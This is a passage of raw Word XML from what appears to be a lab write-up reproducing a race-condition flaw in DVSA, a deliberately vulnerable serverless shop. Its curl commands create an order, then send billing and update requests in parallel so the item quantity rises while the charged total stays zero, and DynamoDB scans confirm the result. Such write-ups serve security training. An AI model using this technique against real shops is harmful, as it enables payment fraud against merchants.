              <w:t>WSL Ubuntu, curl, bash, AWS CLI, DynamoDB Console, Lambda Console</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CF0C20F" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B51A32C" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 4) Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EDB436" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1 — Create a New Order via API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2764AB" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Create a fresh order with 1 item that has not been billed yet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414DC0EC" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EEEFE8A"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curl -s --http1.1 "$API/order" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A7E80D"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-H "Content-Type: application/</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717DEE1F"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-H "Authorization: $TOKEN_A" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07250C55"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--data-raw '{"action":"new","cart-id":"race-cart-001","items":{"1":1}}' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3356D01A" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247A4A44"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Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027FDDDC"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{"status": "ok", "msg": "order created", "order-id": "b4dfb820-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>..."}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7E6EFB83"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export ORDER_ID="b4dfb820-eb89-49cc-8fc5-4c492e8afb49"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B3D272" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479D2193" w14:textId="656DB470" w:rsidR="00A52975" w:rsidRDefault="00D278E0">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:left w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:bottom w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:right w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20F5804D" wp14:editId="19A8819F">
            <wp:extent cx="5943600" cy="2231390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1107003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231390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="721DED27" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Screenshot 1 — Terminal showing new order created via API with order-id returned confirming the order exists in the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011FDF77" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2 — Add Shipping to the Order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECC9A18" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>DVSA requires a shipping address before billing can proceed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A405799" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="216D5576"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curl -s --http1.1 "$API/order" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A745147"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-H "Content-Type: application/</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5F0096"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-H "Authorization: $TOKEN_A" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A654A1"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--data-raw '{"action":"shipping","order-id":"'"$ORDER_ID"'","data":{"address":"123 Test </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Street","email":"test@test.com","name":"Test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> User"}}' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16099209" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08342C2E" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="560"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Response: {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">"status": "ok", "msg": "address </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>updated"}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="548F8A12" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B0B892" w14:textId="35C427C0" w:rsidR="00A52975" w:rsidRDefault="00D278E0">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:left w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:bottom w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:right w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1539954C" wp14:editId="4EA3FA60">
            <wp:extent cx="5943600" cy="3233420"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="20829217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33420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A57F53" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Screenshot 2 — Terminal showing shipping address added successfully with status ok and msg address updated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F12552A" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3 — Verify Order State Before Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5A0713" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Check DynamoDB to confirm the order has 1 item, status 100, and total 0 before the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CE1D12" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B3E2C14" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="560"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>aws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dynamodb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2DF4B9"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--table-name DVSA-ORDERS-DB \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1247FB"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--filter-expression "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>orderId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = :id" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01603BCF"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--expression-attribute-values '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{":id":{"S":"'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"$ORDER_ID"</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E31C95"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--region us-east-1 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> '.Items[0]'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACC7CAA" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D7405A" w14:textId="24CDD9EF" w:rsidR="00A52975" w:rsidRDefault="00D278E0">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:left w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:bottom w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:right w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39B63A08" wp14:editId="4B23D154">
            <wp:extent cx="4229100" cy="6248904"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5698633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33633" cy="6255602"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CC982F" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot 3 — DynamoDB showing order before attack: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>itemList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>={1:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1},</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>orderStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">=100, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>totalAmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=0 confirming the order is open and unpaid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F71499" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4 — Launch the Race Condition Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DDFD09" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Send billing and update requests simultaneously using background processes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444118BD" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="105ED5AB"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echo "=== Race Condition Attack ==="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2137ADC8" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70128F05"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Send billing request in background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1305A9F5"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curl -s --http1.1 "$API/order" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B55C849"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-H "Content-Type: application/</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F17FC6"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  -H "Authorization: $TOKEN_A" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBF8DF2"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--data-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>raw '{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"action":"billing","order-id":"'"$ORDER_ID"'","data</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"ccn":"4242424242424242","exp":"12/28","cvv":"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>123"}}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B54D8A"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-o /</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/billing_result.txt &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706C6BB1" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6C46DC"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Send update request simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E72C94"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curl -s --http1.1 "$API/order" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA60E9F"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-H "Content-Type: application/</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068BB020"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-H "Authorization: $TOKEN_A" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F05E3E"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--data-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>raw '{</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action":"update","order-id</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ORDER_ID"'","items</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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"1":</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5}}'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5C4738"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-o /</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/update_result.txt &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E24E8E4" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2907397D"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wait</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15352EE7"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echo "=== Billing ===" &amp;&amp; cat /</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/billing_result.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34551A20"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echo "=== Update ===" &amp;&amp; cat /</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/update_result.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD81F08" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612B54D7" w14:textId="5C4FFFA3" w:rsidR="00A52975" w:rsidRDefault="00D278E0">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:left w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:bottom w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:right w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="108E29B8" wp14:editId="7996D937">
            <wp:extent cx="5943600" cy="2851150"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="5604025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851150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56629B43" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Screenshot 4 — Terminal showing both billing and update requests running simultaneously as background processes, with update returning status ok and msg cart updated while billing was still processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEB4D68" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 5 — Verify Order Changed After Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2105501F" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Check DynamoDB to confirm the item quantity changed to 5 while total remains 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DF77B9" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F00D278" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="560"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
